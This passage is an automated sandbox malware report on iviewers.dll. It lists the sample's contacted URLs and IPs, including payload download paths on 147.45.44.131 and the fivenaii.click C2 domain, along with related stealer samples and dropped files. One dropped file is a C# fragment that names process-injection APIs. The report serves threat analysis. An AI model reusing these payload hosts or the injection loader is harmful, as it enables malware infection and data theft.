                                                  https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1707694757.0000000005DBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1707861103.0000000005DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760180237.000000000579D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1931436944.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1874038631.00000000062FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1978905072.00000000061FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org0powershell.exe, 0000000E.00000002.1694125670.0000000004F87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://147.45.44.131/infopage/ubvsd.exeqpowershell.exe, 0000001D.00000002.1894591464.0000000007A99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1694181605.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1694150794.0000000004A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1694125670.0000000004D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1718935125.0000000004731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1835577839.0000000004631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861999388.0000000004F8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.0000000005191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://fivenaii.click/80RegAsm.exe, 0000002B.00000002.2108864225.000000000144A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://147.45.44.131/infopage/hgfpj.exe0Mcsc.exe, 0000002E.00000003.1830606968.00000000054D1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://147.45.44.131/infopage/pilgm.ps19Mcurl.exe, 00000019.00000002.1746361769.0000000000550000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crl.microMpowershell.exe, 00000018.00000002.1924356798.0000000006D12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.1707694757.0000000005DBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1707861103.0000000005DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760180237.000000000579D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1931436944.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1874038631.00000000062FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1978905072.00000000061FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000025.00000002.1915834227.00000000052E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000025.00000002.1915834227.00000000052E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://fivenaii.click/7RegAsm.exe, 0000002D.00000002.1866051496.0000000000D74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://go.micropowershell.exe, 0000000C.00000002.1694181605.000000000559D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1694150794.00000000052EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1694125670.000000000514A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1718935125.0000000004B24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1835577839.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861999388.000000000577D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.000000000539F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://147.45.44.131/infopage/pilgm.ps1(curl.exe, 00000019.00000002.1746361769.0000000000558000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://contoso.com/Iconpowershell.exe, 00000025.00000002.1978905072.00000000061FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://fivenaii.click/4RegAsm.exe, 0000002C.00000002.2037048019.0000000003313000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://fivenaii.click/0RegAsm.exe, 0000002D.00000002.1866051496.0000000000D74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://fivenaii.click/cUCRegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://fivenaii.click:443/apiLSIDRegAsm.exe, 0000002C.00000002.2033166708.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000025.00000002.1915834227.00000000052E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://fivenaii.click/53RegAsm.exe, 0000002B.00000002.2108864225.000000000144A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://147.45.44.131powershell.exe, 00000018.00000002.1835577839.0000000004783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1835577839.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861999388.00000000056D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861999388.00000000050D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.0000000005814000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.0000000005692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.0000000005718000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://fivenaii.click/apiFRegAsm.exe, 0000002B.00000002.2109246697.0000000001458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://147.45.44.131/infopage/hgfpj.exeLpowershell.exe, 0000001B.00000002.1861999388.00000000056D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1973866609.00000000085D1000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000021.00000003.1790958160.0000000005550000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1790414514.000000000556D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1790558948.000000000556D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1792494904.000000000556D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1793533684.0000000005553000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1790796208.000000000556D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1793653792.000000000556D000.00000004.00000020.00020000.00000000.sdmp, 1yj35v5c.dll.33.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://147.45.44.131/infopage/hgfpj.exe0csc.exe, 00000020.00000003.1792137730.0000000004E91000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1792106867.00000000071E1000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000022.00000003.1792473123.0000000007181000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://crl.mpowershell.exe, 00000025.00000002.1987305959.00000000078AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.micropowershell.exe, 0000000C.00000002.1693041380.0000000002FF2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1712723583.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1900139630.00000000032A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://fivenaii.click/QRegAsm.exe, 00000031.00000002.2172787217.0000000000D99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://147.45.44.131/infopage/pcurl.exe, 00000019.00000002.1746361769.0000000000558000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1745016542.0000000003568000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000002.1796222258.0000000003328000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://api.telegram.orgpowershell.exe, 0000000C.00000002.1694181605.00000000050CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1694150794.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1694125670.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1718935125.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://147.45.44.131/infopage/pilgm.ps14curl.exe, 00000019.00000002.1746361769.0000000000558000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          149.154.167.220
                                                                          		api.telegram.orgUnited Kingdom
                                                                          		62041TELEGRAMRUfalse
                                                                          104.21.60.24
                                                                          		fivenaii.clickUnited States
                                                                          		13335CLOUDFLARENETUStrue
                                                                          147.45.44.131
                                                                          		unknownRussian Federation
                                                                          		2895FREE-NET-ASFREEnetEUtrue

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1581496
                                                                          Start date and time:2024-12-27 22:32:05 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 8m 49s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:52
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:iviewers.dll
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.expl.evad.winDLL@90/42@2/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 66.7%
                                                                          HCA Information:
                                                                          • Successful, ratio: 98%
                                                                          • Number of executed functions: 60
                                                                          • Number of non-executed functions: 132
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .dll
                                                                          • Stop behavior analysis, all processes terminated

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target RegAsm.exe, PID 2196 because there are no executed function
                                                                          • Execution Graph export aborted for target RegAsm.exe, PID 7548 because there are no executed function
                                                                          • Execution Graph export aborted for target RegAsm.exe, PID 7552 because there are no executed function
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: iviewers.dll

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          16:32:54API Interceptor249x Sleep call for process: powershell.exe modified
                                                                          16:33:13API Interceptor24x Sleep call for process: RegAsm.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          149.154.167.220Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                            i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                              INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                  Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        tg.exeGet hashmaliciousBabadedaBrowse
                                                                                          tg.exeGet hashmaliciousBabadedaBrowse
                                                                                            setup.exeGet hashmaliciousBabadedaBrowse
                                                                                              147.45.44.131qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                                              • 147.45.44.131/infopage/inbg.exe
                                                                                              iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                              • 147.45.44.131/infopage/inbg.exe
                                                                                              Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                                              • 147.45.44.131/infopage/bnkh.exe
                                                                                              htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 147.45.44.131/infopage/ung0.exe
                                                                                              Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                                              • 147.45.44.131/infopage/ilk.exe
                                                                                              Captcha.htaGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 147.45.44.131/infopage/bgfi.ps1
                                                                                              Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                                              • 147.45.44.131/infopage/ung0.exe
                                                                                              EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 147.45.44.131/infopage/vsom.exe
                                                                                              MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.44.131/infopage/Tom.exe
                                                                                              ZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                                                                                              • 147.45.44.131/infopage/tvh53.exe

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              api.telegram.orgFlasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                              • 149.154.167.220
                                                                                              INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                              • 149.154.167.220
                                                                                              Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 149.154.167.220
                                                                                              Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 149.154.167.220
                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 149.154.167.220
                                                                                              setup.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 149.154.167.220
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 149.154.167.220
                                                                                              user.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUShttp://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              launcher.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.58.80
                                                                                              Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.66.86
                                                                                              solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.75.163
                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.2.114
                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.2.114
                                                                                              http://proxyium.comGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.80.92
                                                                                              https://cbhc9.anguatiab.ru/RpweC/Get hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.148.171
                                                                                              search.htaGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.153.170
                                                                                              TELEGRAMRUFlasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                              • 149.154.167.220
                                                                                              JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              https://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.99
                                                                                              aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              installer.batGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              skript.batGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              din.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              yoda.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              lem.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              script.ps1Get hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              FREE-NET-ASFREEnetEUsearch.htaGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.112.248
                                                                                              e9aa0b4540115b3dcec3af70b6de27e54e4a0fa96d1d3.exeGet hashmaliciousRedLineBrowse
                                                                                              • 147.45.44.224
                                                                                              TCKxnQ5CPn.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                              • 147.45.44.151
                                                                                              n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              7ZAg3nl9Fu.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.44.166
                                                                                              7ZAg3nl9Fu.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.44.166
                                                                                              HOrW5twCLd.exeGet hashmaliciousXenoRATBrowse
                                                                                              • 147.45.69.75
                                                                                              cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                              • 147.45.44.224
                                                                                              qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                                              • 147.45.44.131

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0eFlasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                              • 149.154.167.220
                                                                                              738KZNfnzz.exeGet hashmaliciousLummaCBrowse
                                                                                              • 149.154.167.220
                                                                                              TCKxnQ5CPn.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                              • 149.154.167.220
                                                                                              n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              A4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                                                                                              • 149.154.167.220
                                                                                              vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                                              • 149.154.167.220
                                                                                              skript.batGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.220
                                                                                              msgde.exeGet hashmaliciousQuasarBrowse
                                                                                              • 149.154.167.220
                                                                                              6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                                                              • 149.154.167.220
                                                                                              a0e9f5d64349fb13191bc781f81f42e1launcher.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.60.24
                                                                                              Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.60.24
                                                                                              search.htaGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.60.24
                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.60.24
                                                                                              !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.60.24
                                                                                              @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.60.24
                                                                                              Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.60.24
                                                                                              Solara.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.60.24
                                                                                              0x001f00000004676d-1858.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.60.24
                                                                                              eYAXkcBRfQ.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.60.24

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):0.34726597513537405
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlll:Nll
                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                              Malicious:false
                                                                                              Preview:@...e...........................................................

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):1576
                                                                                              Entropy (8bit):5.623775155351
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:CSU4y4RQmFoUeWmfmZ9tK8N/wueOjlZS5Gy7:PHyIFKL3OZ2K/YOZZ4j7
                                                                                              MD5:86FC717792178A3A80A9848160AAF423
                                                                                              SHA1:39CE5F1B9F09E3F19A09E908B9AB132CA20D1C7A
                                                                                              SHA-256:22FFCE0E50CBAB1533601538CAE661ED879FAD5AF98A406C1E5306D37603892E
                                                                                              SHA-512:44E8922BBFBAC388277797B3E38340203C65C462FFF5ECF6833383D6466EC9207CFB6908FB962869E9628D9837A497D08B4CA4D88437C39B4DC500B805074808
                                                                                              Malicious:false
                                                                                              Preview:@...e..........._.....................,..............@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                              C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.0.cs

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):11063
                                                                                              Entropy (8bit):4.547000581752388
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo66T:2oYLoH97t/Z7pgjvzf5XT
                                                                                              MD5:FAC8F0E634D8D7975A6EDC045D89AE09
                                                                                              SHA1:DD06BCC32B91D9635BFA317A5213E3C5EE86D2A0
                                                                                              SHA-256:6F5BD7F4EE85C3181E111CDC470E434875BADEDC87EFC056B8EDF5CD494FBFB2
                                                                                              SHA-512:C8D77D5FA969CC6668C25331B5933C8B98DEDEF9C2DD9DA345C3CF89D96C05CC20953486E9185390501245A12AFB5CF9F37C1B627AECE6D797F0F354F6E27CD5
                                                                                              Malicious:false
                                                                                              Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                                                                                              C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):204
                                                                                              Entropy (8bit):5.117971386349521
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2L/6K2wkn23fxf/VUzxszIwkn23fxf/P:p37L/6KRf5f/qQf5f/P
                                                                                              MD5:C36408FB1CF78051705F47A91CB0C09A
                                                                                              SHA1:13A728DE808AF8ACE47082414E0196C0512A755E
                                                                                              SHA-256:8DFF26476BA3D80899E0B61E66C23FD48F76B9DA0D0F6BBE38B6B19A99CB8441
                                                                                              SHA-512:5824376060D18BF112D2828AC86E52E3CB65D15C407FFDBAC0ECD4D2859CC0D7068F4E173050C9A78F1E10064CE223452B81131C356EB17C45DD86AEA781F1C4
                                                                                              Malicious:false
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.0.cs"

                                                                                              C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):9728
                                                                                              Entropy (8bit):4.63239134074982
                                                                                              Encrypted:false
